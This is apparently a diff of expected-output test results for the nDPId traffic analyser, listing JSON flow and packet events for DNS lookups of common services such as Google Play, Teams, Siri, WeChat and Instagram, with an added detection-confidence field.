+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625744123885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"ts_msec":1625744123885,"pkt":"VASmitEsEL9IThY0CABFAAFrZGIAADwR\/D0ICAgICsgCCwA14SABV21MyVOBgAABABEAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAECAAwHYW5kcm9pZAFswBzAOAABAAEAAAECAARssQ5lwDgAAQABAAABAgAEbLEOccA4AAEAAQAAAQIABEp9g2XAOAABAAEAAAECAARKfYNxwDgAAQABAAABAgAESn2DZsA4AAEAAQAAAQIABEp9g2TAOAABAAEAAAECAARKfYOKwDgAAQABAAABAgAESn2Di8A4AAEAAQAAAQIABEp9zWXAOAABAAEAAAECAARKfc2LwDgAAQABAAABAgAESn3NZMA4AAEAAQAAAQIABEDpoWbAOAABAAEAAAECAARA6aFlwDgAAQABAAABAgAEQOmhisA4AAEAAQAAAQIABEDppIrAOAABAAEAAAECAARA6aRkAAApAgAAAAAAAAA="}
-00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}}
+00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1625744123885,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.177.14.101"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625744123890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1625744123890,"pkt":"ABshv2HAVASmitEsCABFAABO3wwAAEARfrAKyAILCAgICKcmADUAOh0utWIBIAABAAAAAAABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABAAApEAAAAAAAAAA="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123890,"flow_last_seen":1625744123890,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123890,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625744123973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1625744123973,"pkt":"VASmitEsEL9IThY0CABFAACY7gkAADwRc2kICAgICsgCCwA1pyYAhI+OtWKBgwABAAAAAQABASoFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwBQABgABAAABKwA+B25zMS0yMDUJYXp1cmUtZG5zwB4TYXp1cmVkbnMtaG9zdG1hc3RlcsAUAAAAAQAADhAAAAEsACTqAAAAASwAACkCAAAAAAAAAA=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"ts_msec":1625744123973,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"_.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625744123977,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1625744123977,"pkt":"ABshv2HAVASmitEsCABFAABS3y4AAEARfooKyAILCAgICKymADUAPh0yDWEBIAABAAAAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAQAAKRAAAAAAAAAA"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123977,"flow_last_seen":1625744123977,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123977,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625744124006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"ts_msec":1625744124006,"pkt":"VASmitEsEL9IThY0CABFAABiUocAADwRDyIICAgICsgCCwA1rKYATu57DWGBgAABAAEAAAABDHdpZGUteW91dHViZQFsBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAASsABEDppMYAACkCAAAAAAAAAA=="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1625744124006,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"wide-youtube.l.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"64.233.164.198"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625744124010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1625744124010,"pkt":"ABshv2HAVASmitEsCABFAABK30QAAEARfnwKyAILCAgICM09ADUANh0qX5cBIAABAAAAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAEAACkQAAAAAAAAAA=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625744124069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1625744124069,"pkt":"VASmitEsEL9IThY0CABFAACEUooAADwRDv0ICAgICsgCCwA1zT0AcK3sX5eBgAABAAIAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAHADAAFAAEAAAK5AB4RZ3V6em9uaS1hcHBsZS1jb20BdgdhYXBsaW1nwBrALwABAAEAAAErAAQRghUFAAApAgAAAAAAAAA="}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625744124073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1625744124073,"pkt":"ABshv2HAVASmitEsCABFAABM31QAAEARfmoKyAILCAgICNK\/ADUAOB0sVeABIAABAAAAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAQAAKRAAAAAAAAAA"}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625744124417,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1625744124417,"pkt":"VASmitEsEL9IThY0CABFAABsvHUAADwRpSkICAgICsgCCwA10r8AWILaVeCBgAABAAIAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAcAMAAEAAQAAAlcABMvN\/k3ADAABAAEAAAJXAATLzf7cAAApAgAAAAAAAAA="}
-00752{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}}
+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625744124422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1625744124422,"pkt":"ABshv2HAVASmitEsCABFAABY4G8AAEARfUMKyAILCAgICK9TADUARB047MoBIAABAAAAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAQAAKRAAAAAAAAAA"}
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625744124461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":1625744124461,"pkt":"VASmitEsEL9IThY0CABFAABo+pEAADwRZxEICAgICsgCCwA1r1MAVN6x7MqBgAABAAEAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAcAMAAEAAQAAADsABCncnmAAACkCAAAAAAAAAA=="}
